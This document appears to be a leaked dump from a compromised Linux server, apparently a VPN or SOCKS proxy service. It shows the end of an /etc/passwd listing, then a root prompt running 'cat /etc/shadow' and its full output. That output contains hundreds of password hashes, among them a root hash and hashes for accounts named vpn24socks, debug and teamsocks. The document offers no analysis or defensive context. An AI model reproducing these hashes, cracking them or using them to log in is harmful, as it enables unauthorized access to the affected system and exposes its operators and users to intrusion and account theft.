nUYfzYpR4G:x:1490:1490::/home/SSHUSER:/usr/sbin/nologin
8tEhjjRlAC:x:1491:1491::/home/SSHUSER:/usr/sbin/nologin
JpChWSSU54:x:1492:1492::/home/SSHUSER:/usr/sbin/nologin
EnwaHzdt35:x:1493:1493::/home/SSHUSER:/usr/sbin/nologin
juTd17x1Nc:x:1494:1494::/home/SSHUSER:/usr/sbin/nologin
TOTQ91BEwS:x:1495:1495::/home/SSHUSER:/usr/sbin/nologin
6UTA6cTgc2:x:1496:1496::/home/SSHUSER:/usr/sbin/nologin
93EP0GUfGC:x:1497:1497::/home/SSHUSER:/usr/sbin/nologin
N66NJ15WGg:x:1498:1498::/home/SSHUSER:/usr/sbin/nologin
yXmWg290xo:x:1499:1499::/home/SSHUSER:/usr/sbin/nologin
rcc6AHS1Jg:x:1500:1500::/home/SSHUSER:/usr/sbin/nologin
zXMmeDGbqP:x:1501:1501::/home/SSHUSER:/usr/sbin/nologin
7tdzW87F9R:x:1502:1502::/home/SSHUSER:/usr/sbin/nologin
dpswkJLMwG:x:1503:1503::/home/SSHUSER:/usr/sbin/nologin
azsvod1Qyg:x:1504:1504::/home/SSHUSER:/usr/sbin/nologin
72ju0LjHvy:x:1505:1505::/home/SSHUSER:/usr/sbin/nologin
73yatKHdOE:x:1506:1506::/home/SSHUSER:/usr/sbin/nologin
UWC2JU92e0:x:1507:1507::/home/SSHUSER:/usr/sbin/nologin
i1BmroAIeM:x:1508:1508::/home/SSHUSER:/usr/sbin/nologin
8sAlXL7Ibr:x:1509:1509::/home/SSHUSER:/usr/sbin/nologin
kk2M3z5gcp:x:1510:1510::/home/SSHUSER:/usr/sbin/nologin
9cK5xC48nV:x:1512:1512::/home/SSHUSER:/usr/sbin/nologin
SBAetxCLTy:x:1513:1513::/home/SSHUSER:/usr/sbin/nologin
8iZ9BfefaC:x:1514:1514::/home/SSHUSER:/usr/sbin/nologin
D73JHDlBCn:x:1515:1515::/home/SSHUSER:/usr/sbin/nologin
OkpQWghNPU:x:1516:1516::/home/SSHUSER:/usr/sbin/nologin
gUADWitYGX:x:1517:1517::/home/SSHUSER:/usr/sbin/nologin
DaGvQaxltT:x:1518:1518::/home/SSHUSER:/usr/sbin/nologin
pBw5St2oIK:x:1519:1519::/home/SSHUSER:/usr/sbin/nologin
f37WEzjkBK:x:1520:1520::/home/SSHUSER:/usr/sbin/nologin
23101kMksS:x:1521:1521::/home/SSHUSER:/usr/sbin/nologin
OmXdWCH5Fq:x:1522:1522::/home/SSHUSER:/usr/sbin/nologin
6HRKiqn5AS:x:1523:1523::/home/SSHUSER:/usr/sbin/nologin
p8aQLoUmKx:x:1524:1524::/home/SSHUSER:/usr/sbin/nologin
31YimlYNtc:x:1525:1525::/home/SSHUSER:/usr/sbin/nologin
P6q1AGVRjm:x:1526:1526::/home/SSHUSER:/usr/sbin/nologin
lK7CY8gP5z:x:1527:1527::/home/SSHUSER:/usr/sbin/nologin
y5MJDV3DL9:x:1528:1528::/home/SSHUSER:/usr/sbin/nologin
qAcEd9FYMX:x:1529:1529::/home/SSHUSER:/usr/sbin/nologin
GpEu7dTAI7:x:1530:1530::/home/SSHUSER:/usr/sbin/nologin
MSMzq0euqr:x:1531:1531::/home/SSHUSER:/usr/sbin/nologin
inlnCLfVUo:x:1532:1532::/home/SSHUSER:/usr/sbin/nologin
ollSVqKLpa:x:1533:1533::/home/SSHUSER:/usr/sbin/nologin
s2C71Wifr9:x:1534:1534::/home/SSHUSER:/usr/sbin/nologin
UxsvWRQWBq:x:1535:1535::/home/SSHUSER:/usr/sbin/nologin
QY6arE2Ydq:x:1536:1536::/home/SSHUSER:/usr/sbin/nologin
b5sNwDdmEK:x:1537:1537::/home/SSHUSER:/usr/sbin/nologin
pdpUuNAtXK:x:1538:1538::/home/SSHUSER:/usr/sbin/nologin
NxsMofNyV2:x:1539:1539::/home/SSHUSER:/usr/sbin/nologin
DtzoQ2Xw7q:x:1540:1540::/home/SSHUSER:/usr/sbin/nologin
tDBq7HfG3r:x:1541:1541::/home/SSHUSER:/usr/sbin/nologin
f8cDerX7wf:x:1542:1542::/home/SSHUSER:/usr/sbin/nologin
QoTkaCA5hf:x:1543:1543::/home/SSHUSER:/usr/sbin/nologin
Lmh9L2R8qz:x:1544:1544::/home/SSHUSER:/usr/sbin/nologin
kzgMwiKIDN:x:1545:1545::/home/SSHUSER:/usr/sbin/nologin
6pFUWCUnmw:x:1546:1546::/home/SSHUSER:/usr/sbin/nologin
Pgh2JWajwc:x:1547:1547::/home/SSHUSER:/usr/sbin/nologin
PKSb4b3iAN:x:1548:1548::/home/SSHUSER:/usr/sbin/nologin
5DeP78tYXf:x:1549:1549::/home/SSHUSER:/usr/sbin/nologin
ZDrNQotOat:x:1550:1550::/home/SSHUSER:/usr/sbin/nologin
rd5t8jfvnj:x:1551:1551::/home/SSHUSER:/usr/sbin/nologin
vuqRa4K55i:x:1552:1552::/home/SSHUSER:/usr/sbin/nologin
itMjMX8Zgb:x:1553:1553::/home/SSHUSER:/usr/sbin/nologin
MyxPyfxyxX:x:1554:1554::/home/SSHUSER:/usr/sbin/nologin
BcLoH5F0R3:x:1555:1555::/home/SSHUSER:/usr/sbin/nologin
9T9jRHvZ7q:x:1556:1556::/home/SSHUSER:/usr/sbin/nologin
ienW7EvZzk:x:1557:1557::/home/SSHUSER:/usr/sbin/nologin
kdo3z10kOe:x:1558:1558::/home/SSHUSER:/usr/sbin/nologin
WX4JFyd3V4:x:1559:1559::/home/SSHUSER:/usr/sbin/nologin
PAhJp3OPbl:x:1560:1560::/home/SSHUSER:/usr/sbin/nologin
cfmu8MNhEM:x:1561:1561::/home/SSHUSER:/usr/sbin/nologin
iyW122H0oe:x:1562:1562::/home/SSHUSER:/usr/sbin/nologin
3YePbBy2tp:x:1563:1563::/home/SSHUSER:/usr/sbin/nologin

# cat /etc/shadow
root:uOSm9.x7gpWsQ:14915:0:99999:7:::
daemon:*:14642:0:99999:7:::
bin:*:14642:0:99999:7:::
sys:*:14642:0:99999:7:::
sync:*:14642:0:99999:7:::
games:*:14642:0:99999:7:::
man:*:14642:0:99999:7:::
lp:*:14642:0:99999:7:::
mail:*:14642:0:99999:7:::
news:*:14642:0:99999:7:::
uucp:*:14642:0:99999:7:::
proxy:*:14642:0:99999:7:::
www-data:*:14642:0:99999:7:::
backup:*:14642:0:99999:7:::
list:*:14642:0:99999:7:::
irc:*:14642:0:99999:7:::
gnats:*:14642:0:99999:7:::
nobody:*:14642:0:99999:7:::
libuuid:!:14642:0:99999:7:::
bind:*:14642:0:99999:7:::
fetchmail:*:14642:0:99999:7:::
sshd:*:14642:0:99999:7:::
stunnel4:!:14642:0:99999:7:::
smmta:*:14642:0:99999:7:::
smmsp:*:14642:0:99999:7:::
USgK1k659d:itB/c13dN/u7E:14738:0:99999:7::14828:
vpn24socks:$1$g9C2d1Pg$TYfku0QfqwZzCCrihY5BQ.:14897:0:99999:7:::
2ee2JLMeiD:iteTHaYjXCmVg:14741:0:99999:7::14771:
jguv7VJ6ii:itFCIPugyoVGA:14745:0:99999:7::14775:
sOxNXOP2PV:itiUb2mQGkMAM:14748:0:99999:7::14776:
IlE6hFCCQ9:it8sjuBu2UwmA:14758:0:99999:7::14788:
gxCDRFriLl:itATXQT/mvNEM:14759:0:99999:7::14927:
BulLYDNolq:it8SLiNmaP0kI:14760:0:99999:7::14790:
cEzN80h8BB:itl5alHHHRj/o:14761:0:99999:7::14791:
A49RKGrvdB:it.aXsDvAydCw:14761:0:99999:7::14791:
3uUk7DToWo:itIVK64.gWJAA:14761:0:99999:7::14791:
4MMRD3G8gT:it7z/czHZ/4gg:14764:0:99999:7::14794:
QIhyvtXwum:it2ATBMSEZyuY:14765:0:99999:7::14795:
bX8CG70Z8o:itJijnCruWn6s:14765:0:99999:7::14855:
NGHZWVpVuu:itwnfwU18AQZ6:14765:0:99999:7::14855:
MkdEe0NgXc:itiOdqfUCvOOY:14765:0:99999:7::14867:
VP3ofYe5qa:it17IG/Js9Vck:14767:0:99999:7::14797:
s9wnq4iJbL:itF7GdfK4cHwA:14768:0:99999:7::14798:
JF23IDOEX0:itjVH5xatvIjg:14769:0:99999:7::14799:
GOE9IvxCo8:itUnwzzVvUvfI:14770:0:99999:7::14800:
2mAWybIfou:itxaq4qqSWmrM:14770:0:99999:7::14800:
ywLRB9sQG5:it/JoBv/eYT5U:14770:0:99999:7::14800:
U5wILkFczX:itS09vevC2cUk:14771:0:99999:7::14801:
qU247MmWWp:itGjgxFlOLsNY:14771:0:99999:7::14801:
JpE3P8WgBN:itz5J2D3BnylQ:14772:0:99999:7::14802:
OTx2pkLemc:itdrcEiHMAcmo:14773:0:99999:7::14803:
tLDp1920ug:itrlGlUwCXA2.:14773:0:99999:7::14803:
pzSoTppzAu:itYHMFEVKujMQ:14774:0:99999:7::14804:
fcz40nnjZr:itrE5RglVeq6I:14775:0:99999:7::14805:
1TEkAllzys:itCa0ysI.zviM:14776:0:99999:7::14806:
WMfvkEivY0:itEB014a/919s:14776:0:99999:7::14806:
4Vvq0LAF9r:itQa.hMitwqBk:14780:0:99999:7::14810:
QVMgMXxSeK:itjWbRYcqg68.:14781:0:99999:7::14811:
dtxSHwZpH3:itylRO//M3ToE:14781:0:99999:7::14811:
Uth54wPUPD:itJq7wfSkYO0Y:14781:0:99999:7::14811:
eCWEZEQZVq:itQpFlgIXcbIs:14783:0:99999:7::14813:
wp6WkrrhkH:itFOBdWM6twuU:14783:0:99999:7::14814:
QLGAfXHUAX:it0QHPOluaMyM:14785:0:99999:7::14815:
NWPWWWxBnh:itUf75Y/bENEQ:14785:0:99999:7::14815:
LY5yDIThxj:itcfUQF1iv2/I:14787:0:99999:7::14817:
LvJSd7KRCq:itHhdmnQ5K1BU:14788:0:99999:7::14818:
DNlBW8cww2:it34R5ynNPess:14788:0:99999:7::14818:
22JAEReAWb:itYK1kHANDxdk:14789:0:99999:7::14819:
1U7iYfKkZg:itBz2LEk.iv9c:14789:0:99999:7::15149:
A9RlGkkBly:it2GU6kR9pzQQ:14791:0:99999:7::14821:
ezjCz5tTLo:it4LXhsv8Gp3Y:14792:0:99999:7::14822:
CZ298VrwyT:itCaZtRbDIyXc:14793:0:99999:7::14823:
DDFFWPh13H:itzt.DXQW5/8Y:14793:0:99999:7::14858:
FwKPqLl9HO:itJtQGEkrPt12:14794:0:99999:7::15154:
4GA5FfwFEB:itbSS8sFdc0XI:14795:0:99999:7::14825:
6RyUaunr8w:itprojJIZZK5k:14795:0:99999:7::14825:
O2cPtoYJSA:itELh9gttdfwA:14795:0:99999:7::14825:
OieOTeMsVT:itmaN6.6K.hks:14795:0:99999:7::14825:
nqh2PPsJoX:itxfNQjUZHEPs:14795:0:99999:7::14825:
vLymjSZ2PC:it/91D7UOOkPg:14796:0:99999:7::14826:
BB22Ob0wRq:itN1e64V2oPNE:14797:0:99999:7::14887:
osHYLha9Xa:itTVoqQl2rXro:14798:0:99999:7::14828:
Mjs6t1fh7r:ituFJPgjyRlmo:14799:0:99999:7::14829:
DEZtQQ9XlX:ithmUxn.OIhQ2:14800:0:99999:7::14830:
GIVQTfHrFc:itYXpaa4uuO0A:14800:0:99999:7::14830:
6keWEVe8CF:it4Z4E1cdXWTI:14801:0:99999:7::14831:
f4rKlco33u:it340SfG3g5ZQ:14802:0:99999:7::14844:
7iVUdiWpZI:it1tZD4MEeonE:14802:0:99999:7::14832:
WBuxr9t5xJ:itppUICuI64vQ:14802:0:99999:7::14832:
9q9ZUnLTQd:itHZZD4CYjEd2:14802:0:99999:7::14832:
Aw1GQfhx6F:itypRPeiXHUDw:14802:0:99999:7::14832:
uurtXDhjEU:itrLEiUz1FSgs:14803:0:99999:7::14833:
G7lfd8zf1h:ithYIaAgjMZy.:14803:0:99999:7::14834:
EMY6T7qTGu:itKs8yYfyU7Bs:14803:0:99999:7::14833:
IzPTVGc4Yo:it4AQn9hNTDpk:14803:0:99999:7::14833:
4RmVWo7T4v:itI86zNOA452w:14804:0:99999:7::14834:
z9VTnI5JJX:itL2OMielYObw:14804:0:99999:7::14834:
qF7C1TR0he:ithzxC2YWnZMo:14804:0:99999:7::14834:
OxUqFE7v5H:it0ak6/xHcP3g:14805:0:99999:7::14835:
QluTWIEQSG:itH4r8I9fzUJg:14805:0:99999:7::14835:
APi3yQS9Dt:it49aPUsbfswM:14805:0:99999:7::14835:
KscYKlIxxP:itkBdUgq1XVUk:14805:0:99999:7::14835:
4OrVVMvg5b:itsUVdh9jlIKI:14806:0:99999:7::14836:
9q9wWck1iv:itW9jPOWvAS.M:14807:0:99999:7::14837:
7T3MmDDuYA:itcx4CkzJFETM:14807:0:99999:7::14837:
9i3rSA1t3B:it.SYvXlNGEL6:14807:0:99999:7::14837:
OG60AiIy32:itQwkvbyk2rbk:14807:0:99999:7::14837:
XQlGb5EDEX:it39CL0eAM7eM:14808:0:99999:7::14838:
gSPbDrdVM7:it.OYEbMgwySk:14808:0:99999:7::14870:
bn1XjaAbBO:ithpu.MOWcN2Q:14808:0:99999:7::14838:
eEAGLP58B1:itASzjdyZDpVo:14808:0:99999:7::14868:
19vuUOl1DA:itiI2y7mrWeoI:14809:0:99999:7::14839:
GJTBqAX0Po:it1Uu/W3WNcUw:14810:0:99999:7::14840:
YlKhbzOzlW:itedPh8uS.GGE:14810:0:99999:7::14840:
P1IEuRFxoc:itWvqWDbD7LPs:14811:0:99999:7::14841:
M74tz0c6cB:itvzbN7i9gD76:14812:0:99999:7::14842:
pxCR5mWYxl:it29eclf7EmX2:14812:0:99999:7::14842:
BYBEFkGPOv:itnT9MWIzJSMA:14812:0:99999:7::14842:
bLQLndsfG7:itOU5lmCywYyA:14812:0:99999:7::14842:
7RsRZ2UUu4:itJQWHjmDMSBg:14813:0:99999:7::14843:
gbWPMY3QUz:itMWiO7Rdw7j.:14814:0:99999:7::14844:
3DPSaYAK0I:itnXdG3B7xJJo:14815:0:99999:7::14870:
Mfa9YHsFwm:ittgjSkT2gj4k:14816:0:99999:7::14846:
MCdvro0waF:it3nns/B37m8A:14816:0:99999:7::14846:
4qTipZxa3g:it/TEdalbJMfM:14816:0:99999:7::14874:
jzJtLApQhG:itsr9y.rbSg4Q:14818:0:99999:7::14848:
MfJ1grnWz2:itGx1RoQ6IKB6:14818:0:99999:7::14877:
TKTlaudWc6:itPNHr6KpAPRQ:14819:0:99999:7::14849:
Pg6UVUT4Zi:itApd4kWtPxgI:14820:0:99999:7::14850:
7KxfsATvUY:it7TTxqh9nyK2:14820:0:99999:7::14850:
1YzAOqKyJU:it6ZiWQAL2wmU:14820:0:99999:7::14850:
ArAdFXiTdV:itvOH9eWcd6hE:14820:0:99999:7::14850:
Tyt6Mxbjb9:itkMpS8/7LT4E:14822:0:99999:7::14912:
p5TdBxcMOd:it5XCnCv7GOWc:14822:0:99999:7::14852:
HCj78QJ6bB:itV2E5FPhjv/Q:14823:0:99999:7::14853:
ataiqUNkhi:itFF/b/bbv4dg:14823:0:99999:7::14853:
BDnc11BaRR:itAgVwadM3n1o:14824:0:99999:7::14854:
0xs05pGnsc:itb2On91sFue2:14825:0:99999:7::14855:
6lCpT6Rtlb:itLieCtWiSNmk:14825:0:99999:7::14855:
MZGuvPmcQQ:itwBeYSCWzonc:14825:0:99999:7::14855:
S393KhVsS0:it0ImcxR03.Bc:14825:0:99999:7::14825:
hePPBhA3Zb:iteURoscPLWpE:14825:0:99999:7::14855:
xU33BmPZBt:itkHe9tsySfM2:14826:0:99999:7::14858:
8kTCqMWNer:itlb1jZxpEa4w:14828:0:99999:7::14858:
Z9mwX94DwA:it3WSVa8R07ls:14830:0:99999:7::14860:
QE70dT7Sk6:it0Tv1gANLfrw:14832:0:99999:7::15011:
3nRGuwyy3O:itRWTUESeEAnM:14832:0:99999:7::14862:
7lHu9x5ahz:itLFhHr4cMgEA:14832:0:99999:7::14862:
yQt4twcYHi:it9/qpjACWSpA:14832:0:99999:7::14862:
5QOvATUZRp:itkUCczUilUa6:14833:0:99999:7::14863:
qrIJmTNsip:itQn6yP0a1D3w:14834:0:99999:7::14932:
3MD6MyTcBm:itkGQqOqkAd6A:14834:0:99999:7::14864:
tX55vN8iBA:itVhqTDrPxB3E:14835:0:99999:7::14865:
MUF31iM1WD:it1bqY2btUtgc:14835:0:99999:7::14865:
6I1FTys1aV:it1G8ffMZkwBs:14836:0:99999:7::14926:
wH5nC1icK0:itsxFgyt7IG7.:14837:0:99999:7::14837:
z9GYUjVR9T:itW2tKlBIbklM:14837:0:99999:7::14842:
uiv8RD7GCm:itSRd/dT4W7ig:14837:0:99999:7::14867:
debug:$1$yShOv8Qf$hR6RSu48g2kUAOV18q23Q.:14837:0:99999:7:::
udewQStk6R:itqzk9aMNRAtI:14837:0:99999:7::14867:
YRfpne3P1W:it7MwZ1NA4Qg6:14838:0:99999:7::14868:
2G6ixqigXX:itYHt1qHMyxg6:14838:0:99999:7::14868:
FZ6nGPBlnq:itTB9Xib/.Jms:14838:0:99999:7::14868:
N4WUxGoeHX:itEmsj0kbt5Ig:14838:0:99999:7::14868:
3qoY48h6od:itzq1YDUTChmo:14839:0:99999:7::14869:
0KltTgDdxs:itjH.XV1RHImM:14839:0:99999:7::14869:
KnOIZkAYhv:itB/NLcosNZao:14840:0:99999:7::14870:
pduruQrvQw:itiNBdTTqSHXc:14841:0:99999:7::14871:
gfPh6U7BSL:itCwYFdL4JCUs:14842:0:99999:7::14872:
5d4PClWw9W:it8p4QD0G52a.:14842:0:99999:7::14872:
X3IwwuMhVn:itNC9p4Jw4Sew:14842:0:99999:7::14872:
9lKRF8UVul:itpPmVNnqzz8s:14843:0:99999:7::14875:
7OEkZFXfrj:itW9kD.grdiZc:14844:0:99999:7::14874:
XR9kXMus18:itup25xiWxlJE:14844:0:99999:7::14874:
LeJdtNDj0s:itu.0zdvPYBqU:14844:0:99999:7::14874:
sMdDwKbykL:itUWFJ7x2CEvE:14844:0:99999:7::14874:
RLPQ9lCkkg:itSEmJMpmRKuY:14845:0:99999:7::14875:
m07JSN8S1t:ithZZB/vxmf9s:14845:0:99999:7::14875:
KoW5ucmliR:itbs5gLqLFQ6U:14845:0:99999:7::14875:
vxaNuWuV5A:itQ/9L7nfjCGs:14846:0:99999:7::14876:
r6cQANOWcM:iteuR8tiYJc0A:14846:0:99999:7::14876:
GefhxHzMLB:itbcf7Sdv5haA:14847:0:99999:7::14877:
gghzgxMlzK:itv2DXUhR8k.E:14848:0:99999:7::14878:
dTECuvvcnY:itjIptA916Ebc:14848:0:99999:7::14878:
teamsocks:itt.x7Yyh3o4c:14848:0:99999:7::15706:
2ZzW1TPwek:italJuFQJ5a3s:14850:0:99999:7::14880:
98pASZD7ZL:itxSgbMMIp5Ss:14850:0:99999:7::14880:
rgNCfMxMDE:itUv8r76CvnFE:14852:0:99999:7::14942:
TPJNO6U7gB:it3nK7o5rGQTs:14854:0:99999:7::14884:
ZfQAMBcfd9:itn/Ahnp4SGYI:14855:0:99999:7::14885:
DWJLuNgRHq:it7fcSOrx.qzs:14856:0:99999:7::14886:
26PWTAtsMQ:itp0wE97MeJeY:14856:0:99999:7::14886:
wiDxLyK5di:itGyNef3zsBUc:14856:0:99999:7::14886:
OOueJqB7Ux:itLOQI2IJENTA:14856:0:99999:7::14946:
EaDZkcpMhf:itabLuw41OymE:14856:0:99999:7::14886:
swj3AHcyct:itgTFah5u7zEE:14857:0:99999:7::14887:
tf1x5jgZf7:it5.he.1J8Tos:14857:0:99999:7::15217:
fTkJjFodJR:itlImxgGtzX8E:14858:0:99999:7::14888:
q8Ospeoqjm:itfK2S6qHfdY.:14858:0:99999:7::14888:
atIdo8CMgl:itDJAu0FCjkD6:14858:0:99999:7::14888:
AIVtIPpwbI:it./a4jMDch9s:14858:0:99999:7::14888:
83ssqOi2mG:itf5ysL1ik1Uo:14859:0:99999:7::14889:
mDhIWzTPpL:itlbdpvX.70XI:14859:0:99999:7::14889:
aw1h0yzOXG:it7nEFlm.U1HE:14860:0:99999:7::14890:
8aXdZvgEAL:itHvOP3gWy0Ek:14860:0:99999:7::14890:
7DpjZkkKRH:it8lCum3QfKEE:14861:0:99999:7::14952:
AA4KnP2gQo:itYZtCLpMWh.6:14861:0:99999:7::14891:
OdJUE9NXz0:itPdSjh4MZGNk:14861:0:99999:7::14891:
WRwA7CA595:itk9xrbc96b6k:14862:0:99999:7::14892:
UHJXsI3u7T:itvRm6Pm8LxZs:14862:0:99999:7::14896:
AfPMi3Orqx:itK3vLE/cImqE:14862:0:99999:7::14892:
IIpk9TW4Hy:itjUMQ7TIWFks:14863:0:99999:7::14893:
GfXK6QYZvV:itEba4yQ5bD7Y:14863:0:99999:7::14893:
O2JLXab4Qb:itCguhLtUWcso:14864:0:99999:7::14894:
abobJxNBqT:itPzo69efPDNI:14865:0:99999:7::14895:
PAZYQvYMzp:itJXiA.Q6LtCs:14865:0:99999:7::14895:
mein:itz93owDvH2ig:14868:0:99999:7::14975:
In1AVHseTI:its.B5WuD6CPI:14868:0:99999:7::14898:
1yNGl2LCqo:itfhGvLrzeOro:14869:0:99999:7::14899:
UcblLYHagd:itrGN5VJ63iv2:14870:0:99999:7::14908:
GXFmqv0v6j:it4egLMyCOPXQ:14870:0:99999:7::14960:
eb0MkURFMR:iteVQ0NCSyuz2:14871:0:99999:7::14901:
ZF0P5R5HY1:itYKl7wO/tN6w:14871:0:99999:7::14901:
raiesY1Uya:it9XdP1qAJmpI:14871:0:99999:7::14961:
6vWXOICD5H:itAlbixHt8.fY:14871:0:99999:7::14901:
EHgdxvxbz6:it6FuhzCGg6TA:14871:0:99999:7::14901:
A9cAJOMNCY:it57H1zG3qv.Y:14872:0:99999:7::14901:
tHx7Nh5Kfp:itaW6Jr4ZZU.A:14874:0:99999:7::14979:
cvs7ZHnMch:itqel0UM7hH0k:14874:0:99999:7::14904:
R2XHmC62ZS:itSJbO1UjIVk.:14874:0:99999:7::14904:
OthdQ1Nmh5:itHAEGeiEMFhc:14874:0:99999:7::14905:
bhUizLPv0M:itHrknSzaql8U:14875:0:99999:7::14905:
FqBNIU3BXX:itL7IoJ8HGtjQ:14875:0:99999:7::14905:
cYuowtqfqp:it7vPDLMFamNU:14877:0:99999:7::14913:
ohLtOJoye9:itDe3UkvVMw/o:14877:0:99999:7::14967:
0xlfaHuCkh:itgwvKix98Szs:14879:0:99999:7::14909:
9oaRxjmjhy:itG4hyGTxFl9U:14881:0:99999:7::14911:
8YNxD3ah6D:itg0cQ4Ya.K2A:14881:0:99999:7::14911:
vd8oJtJgZr:itkGNuz.DvpB.:14883:0:99999:7::14913:
NwIUjcCYZG:itn7cOK0MxTPU:14884:0:99999:7::14914:
4nduuzyTQx:itmTdvrcDqztk:14885:0:99999:7::14915:
9qAqHLtLBx:it1RA5I5xwmyo:14886:0:99999:7::14939:
tuy9erQgxJ:itz9g1V7Y1Vog:14886:0:99999:7::14916:
GMunVltQvi:itlZMoR4eis5Q:14887:0:99999:7::14917:
sqYWjLaKXf:itaBZ/6eFpuME:14887:0:99999:7::14917:
ymLHzXSVjD:itiepJpQGPLR2:14888:0:99999:7::14918:
cG6fOsmfgT:itVe1Sv269.cE:14888:0:99999:7::14918:
Xv02xz1TQc:itNvLoD4b2F2U:14888:0:99999:7::14918:
13rRlbMsXc:itBiYQEEILlTA:14889:0:99999:7::14919:
o1NbEhdi1P:it5mVEaFWNf1.:14892:0:99999:7::14922:
SvOn61Ck0K:itTHDnZHL3bH6:14893:0:99999:7::14923:
LykwDkKp22:itk3nH54N5/lA:14894:0:99999:7::14924:
gDFHnIx6gq:itCJAnpVw.1oE:14894:0:99999:7::14929:
BQBra5cl9R:itxMiTR8/w.HU:14894:0:99999:7::14953:
4DaHNYAOXR:it/K.0bHmCxBM:14894:0:99999:7::14924:
mybkiYHe4L:itHs/OAKJg9PA:14895:0:99999:7::14935:
EZPpg2A55v:itUuxKhoP1VMI:14895:0:99999:7::14925:
ZtLdtMOxjz:itvFAdL7qAoAs:14896:0:99999:7::15256:
zyDY1v3Ifs:itxQpXl2lf5sw:14897:0:99999:7::14927:
vk9rnSCr7X:itjnkjv6.SGWY:14897:0:99999:7::14927:
nBeRUhO19Z:itPauEauIQk66:14897:0:99999:7::14927:
TeXbvEj3oJ:itr2mNVe6XTuo:14898:0:99999:7::14928:
2Fr6Xq4WyM:it3/yboYrUhVg:14898:0:99999:7::14928:
yZsxPqnHdR:itabo7ALxf5rQ:14898:0:99999:7::14928:
uQ4lOfB4g0:it/PdCIWid8A6:14898:0:99999:7::14988:
tMOYcIGsBO:itPslV9tgLazM:14899:0:99999:7::14929:
rbcBkgkMCF:itdT/Uyv7HH.c:14899:0:99999:7::14989:
r0FjhxSADo:itSltUoI6eVvI:14899:0:99999:7::14929:
88rM31v2oJ:itwg7qhCbYMag:14899:0:99999:7::14929:
d3rdsSAt5s:itWSsOAmAXv/s:14900:0:99999:7::14990:
frpOFX7CGJ:ituk9m0heMvJ.:14900:0:99999:7::14930:
DN4SdAwDUX:itqnCyrFKN/gM:14900:0:99999:7::14930:
SWsT6SYBW0:itv7UN0iZGIDo:14901:0:99999:7::14931:
mqdlYki3Bu:itoLRPE/V.0qY:14901:0:99999:7::14931:
Kf6hkNRFbt:itMMt7WyGBLmY:14902:0:99999:7::14932:
VRKabwxsRz:ithk9weHHtqcc:14903:0:99999:7::14933:
W149pluZd9:itx/z6pbrhv3I:14903:0:99999:7::14933:
UzPuS4CkgJ:itoICMixQ6M8Q:14904:0:99999:7::14934:
UsGU5GLZmf:it7aNFj10DUTs:14904:0:99999:7::14934:
r4xLEdMjeu:itHsIkGueCPbk:14906:0:99999:7::14936:
lutZaKA8pP:itc61fNMFA/3E:14907:0:99999:7::14936:
usDgH6KNsm:itd06qFZIEABM:14907:0:99999:7::14937:
CMSc3fnm0o:itI3zX6jizp9o:14907:0:99999:7::14937:
vYwuL6Uwia:itcM5h0kqE6Ow:14908:0:99999:7::14938:
yaSgVmndrd:it3y5K4Adi7w6:14909:0:99999:7::14939:
dfvW2pna2L:itINr2NMjgQpM:14910:0:99999:7::14940:
ng3LKLliu1:it7C53g6Lz48A:14912:0:99999:7::14942:
8SVb2iLNbA:itOjHA6.KhcCk:14912:0:99999:7::14942:
3aiHc3W1co:itZc.Y8xjdHo6:14913:0:99999:7::14942:
mON9q5Awho:itk.QmqSq0R9I:14913:0:99999:7::14943:
FRXf5cUHNA:itkv83lbiIlDQ:14913:0:99999:7::14943:
X2w1wWC8cc:itAZHmcDJATPY:14914:0:99999:7::14944:
KbZzI1EGD7:itQYRLQgetcXo:14914:0:99999:7::14944:
vwX6HwC8Lh:itIBgY/SDaCf2:14914:0:99999:7::14944:
YbDmrQ3uHX:itwHmpepzmsyo:14914:0:99999:7::14944:
XwrlqzZcqt:itUzpgEXgBeQY:14914:0:99999:7::14944:
Zr5u4mLaor:itfloQkXhD5u6:14915:0:99999:7::14945:
yRkX9kmf4d:it8vky1.FP1v.:14915:0:99999:7::14945:
VPPl3s7YUL:itiEkuDw5DI7g:14916:0:99999:7::14946:
OTgrnEWUwc:itOt0S/uMUf4M:14916:0:99999:7::14946:
G0OREuDm37:it3eS6p4sq3Zc:14916:0:99999:7::14946:
CQyjF4u7CS:itlt3wTyLL1mY:14916:0:99999:7::14946:
XwU6xeJKMx:it/6xa8WMPDh.:14917:0:99999:7::14946:
aklcI4G2Hr:itznhpJlcPCLE:14917:0:99999:7::14947:
mT7JPIqVuf:itw4vdCKM5hh6:14917:0:99999:7::14947:
gsZxRf05sx:it5HQlC6kFh4k:14917:0:99999:7::14947:
v716hX8oaW:itEqiR8DNv1qA:14919:0:99999:7::14949:
Mmh3M4oP0v:itOBibBZTmXD6:14920:0:99999:7::14950:
ctV3NEzitO:itBbFVXGBG4BU:14920:0:99999:7::14950:
wKer3VQNa8:itnDVU6wdMvG.:14921:0:99999:7::14951:
76BuKJAIQs:itQPcXWud8yfg:14921:0:99999:7::14951:
k1dO6lfMNd:it90nC0giFbtw:14922:0:99999:7::14952:
I6J3JHUqC1:it/srYUBNHo9M:14922:0:99999:7::14952:
GYoFHeDm0z:itBQLqu6UxphI:14922:0:99999:7::14952:
72YV5GHBVx:itQ8ASN1Cpbfk:14923:0:99999:7::14953:
G71wfQEPoC:itVuq/dID19J6:14924:0:99999:7::14953:
HgcCrXDKen:itKN1JIcX0nBw:14924:0:99999:7::14954:
gbzSM7ywwW:itT7p0thywHrI:14925:0:99999:7::14954:
dfJJwbDOaG:it8swpmidw2XI:14925:0:99999:7::15015:
4Saf8LwCcR:it9dSQLwlJtIs:14927:0:99999:7::14957:
1eeUWOlK9E:itzm7AcIRfnxY:14928:0:99999:7::14987:
Cll4KDM0W3:ita3TIkuFg1/2:14929:0:99999:7::14958:
OJAEWyDwCI:itqAL74wVHS9w:14929:0:99999:7::15019:
q1iyUEbI5V:itqyIpWotaOKY:14930:0:99999:7::15020:
2N1Uo47Mlg:itxcvxQxkmIJw:14931:0:99999:7::14961:
ruVtSN24pr:it3hysvh0JWzg:14932:0:99999:7::14962:
zJltMD4mG9:itTv938Zg94SM:14934:0:99999:7::14964:
WkUUS9RQf0:it.o2Ii05q/rQ:14934:0:99999:7::14964:
bWauNdcsMn:itRPpz0Y9lxlg:14934:0:99999:7::14994:
S5UKpRwg51:itNLqhJ7Hekt2:14934:0:99999:7::14964:
stFt5RwE33:itIYMTiTEIJFA:14935:0:99999:7::14965:
OCUbNto6Bg:itwtuO08u6Whk:14935:0:99999:7::14965:
eIxatCSG1U:itZchcu.o/waE:14935:0:99999:7::14965:
zXcXCYaIpo:it7JduWDCGa7I:14936:0:99999:7::14966:
RBNgJIRt49:itHHvqlfsenFs:14936:0:99999:7::14966:
